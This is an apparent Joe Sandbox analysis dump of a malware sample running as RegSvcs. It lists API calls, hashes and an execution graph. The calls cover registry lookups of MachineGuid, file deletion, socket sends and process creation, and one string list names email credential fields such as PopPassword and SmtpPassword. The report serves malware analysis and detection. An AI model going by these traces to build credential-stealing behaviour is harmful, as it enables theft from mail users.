                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InformationToken
                                      • String ID: IDA
                                      • API String ID: 4114910276-365204570
                                      • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                      • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                      • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                      • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                      APIs
                                      • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc
                                      • String ID: s1@
                                      • API String ID: 190572456-427247929
                                      • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                      • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                      • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                      • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                      APIs
                                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                      • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                      • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 1425999871-0
                                      • Opcode ID: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
                                      • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                      • Opcode Fuzzy Hash: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
                                      • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                      APIs
                                      • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CheckMembershipToken
                                      • String ID:
                                      • API String ID: 1351025785-0
                                      • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                      • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                      • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                      • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                      APIs
                                      • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateDirectory
                                      • String ID:
                                      • API String ID: 4241100979-0
                                      • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                      • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                      • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                      • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                      APIs
                                      • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InfoNativeSystem
                                      • String ID:
                                      • API String ID: 1721193555-0
                                      • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                      • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                      • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                      • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                      APIs
                                      • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: send
                                      • String ID:
                                      • API String ID: 2809346765-0
                                      • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                      • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                      • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                      • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                      APIs
                                      • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileMove
                                      • String ID:
                                      • API String ID: 3562171763-0
                                      • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                      • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                      • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                      • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                      APIs
                                      • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Startup
                                      • String ID:
                                      • API String ID: 724789610-0
                                      • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                      • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                      • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                      • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                      APIs
                                      • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                      • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                      • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                      • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                      APIs
                                      • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Open
                                      • String ID:
                                      • API String ID: 71445658-0
                                      • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                      • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                      • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                      • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                      APIs
                                      • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteFile
                                      • String ID:
                                      • API String ID: 4033686569-0
                                      • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                      • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                      • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                      • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                      APIs
                                      • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                      • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                      • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                      • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                      APIs
                                      • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseFind
                                      • String ID:
                                      • API String ID: 1863332320-0
                                      • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                      • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                      • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                      • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                      APIs
                                      • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                      • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                      • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                      • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                      APIs
                                      • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                      • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                      • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                      • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                      APIs
                                      • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID:
                                      • API String ID: 1174141254-0
                                      • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                      • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                      • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                      • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                      APIs
                                      • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: closesocket
                                      • String ID:
                                      • API String ID: 2781271927-0
                                      • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                      • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                      • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                      • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                      APIs
                                      • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeVirtual
                                      • String ID:
                                      • API String ID: 1263568516-0
                                      • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                      • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                      • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                      • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                      APIs
                                      • CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle
                                      • String ID:
                                      • API String ID: 2962429428-0
                                      • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                      • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                      • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                      • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                      APIs
                                      • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                      • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                      • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                      • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                      APIs
                                      • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                      • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                                      • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                      • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                                      APIs
                                      • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                      • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                      • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                      • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                                      APIs
                                      • CoInitialize.OLE32(00000000), ref: 0040438F
                                      • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                      • VariantInit.OLEAUT32(?), ref: 004043C4
                                      • SysAllocString.OLEAUT32(?), ref: 004043CD
                                      • VariantInit.OLEAUT32(?), ref: 00404414
                                      • SysAllocString.OLEAUT32(?), ref: 00404419
                                      • VariantInit.OLEAUT32(?), ref: 00404431
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InitVariant$AllocString$CreateInitializeInstance
                                      • String ID:
                                      • API String ID: 1312198159-0
                                      • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                      • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                      • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                      • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                      • API String ID: 0-2111798378
                                      • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                      • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                      • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                      • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                      • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                      • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                      • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

                                      Execution Graph

                                      Execution Coverage:10.9%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:58
                                      Total number of Limit Nodes:6
                                      execution_graph 17179 28d4668 17180 28d467a 17179->17180 17181 28d4686 17180->17181 17183 28d4778 17180->17183 17184 28d479d 17183->17184 17188 28d4879 17184->17188 17192 28d4888 17184->17192 17185 28d47a7 17185->17181 17189 28d4888 17188->17189 17191 28d498c 17189->17191 17196 28d44b4 17189->17196 17191->17185 17193 28d488c 17192->17193 17194 28d44b4 CreateActCtxA 17193->17194 17195 28d498c 17193->17195 17194->17195 17195->17185 17197 28d5918 CreateActCtxA 17196->17197 17199 28d59cf 17197->17199 17200 28dd968 DuplicateHandle 17201 28dd9fe 17200->17201 17202 6f36358 17203 6f3636d 17202->17203 17208 6f363f6 17203->17208 17213 6f36398 17203->17213 17217 6f36389 17203->17217 17204 6f3637f 17209 6f36384 17208->17209 17211 6f363f9 17208->17211 17210 6f363d6 17209->17210 17221 6f367f8 17209->17221 17210->17204 17211->17204 17214 6f363b2 17213->17214 17215 6f363d6 17214->17215 17216 6f367f8 2 API calls 17214->17216 17215->17204 17216->17215 17218 6f363b2 17217->17218 17219 6f363d6 17218->17219 17220 6f367f8 2 API calls 17218->17220 17219->17204 17220->17219 17222 6f36847 17221->17222 17226 6f33e08 17222->17226 17230 6f33dfc 17222->17230 17227 6f33e91 17226->17227 17227->17227 17228 6f33ff6 CreateProcessA 17227->17228 17229 6f34053 17228->17229 17231 6f33e08 17230->17231 17231->17231 17232 6f33ff6 CreateProcessA 17231->17232 17233 6f34053 17232->17233 17171 28db390 17174 28db478 17171->17174 17172 28db39f 17175 28db4bc 17174->17175 17176 28db499 17174->17176 17175->17172 17176->17175 17177 28db6c0 GetModuleHandleW 17176->17177 17178 28db6ed 17177->17178 17178->17172 17234 28dd720 17235 28dd766 GetCurrentProcess 17234->17235 17237 28dd7b8 GetCurrentThread 17235->17237 17238 28dd7b1 17235->17238 17239 28dd7ee 17237->17239 17240 28dd7f5 GetCurrentProcess 17237->17240 17238->17237 17239->17240 17241 28dd82b GetCurrentThreadId 17240->17241 17243 28dd884 17241->17243

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 295 28dd720-28dd7af GetCurrentProcess 299 28dd7b8-28dd7ec GetCurrentThread 295->299 300 28dd7b1-28dd7b7 295->300 301 28dd7ee-28dd7f4 299->301 302 28dd7f5-28dd829 GetCurrentProcess 299->302 300->299 301->302 304 28dd82b-28dd831 302->304 305 28dd832-28dd84a 302->305 304->305 308 28dd853-28dd882 GetCurrentThreadId 305->308 309 28dd88b-28dd8ed 308->309 310 28dd884-28dd88a 308->310 310->309
                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 028DD79E
                                      • GetCurrentThread.KERNEL32 ref: 028DD7DB
                                      • GetCurrentProcess.KERNEL32 ref: 028DD818
                                      • GetCurrentThreadId.KERNEL32 ref: 028DD871
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.2502840522.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_28d0000_aWBoUwiux.jbxd
                                      Similarity
                                      • API ID: Current$ProcessThread
                                      • String ID:
                                      • API String ID: 2063062207-0
                                      • Opcode ID: a40fccbc85728e561c7f1b6897e48d2a7303404d9d01df349abf8164e9863bb3
                                      • Instruction ID: 2572fd981db1fd499d3377c1e76df3157370f7c90d44ba2329d99a68608fd549
                                      • Opcode Fuzzy Hash: a40fccbc85728e561c7f1b6897e48d2a7303404d9d01df349abf8164e9863bb3
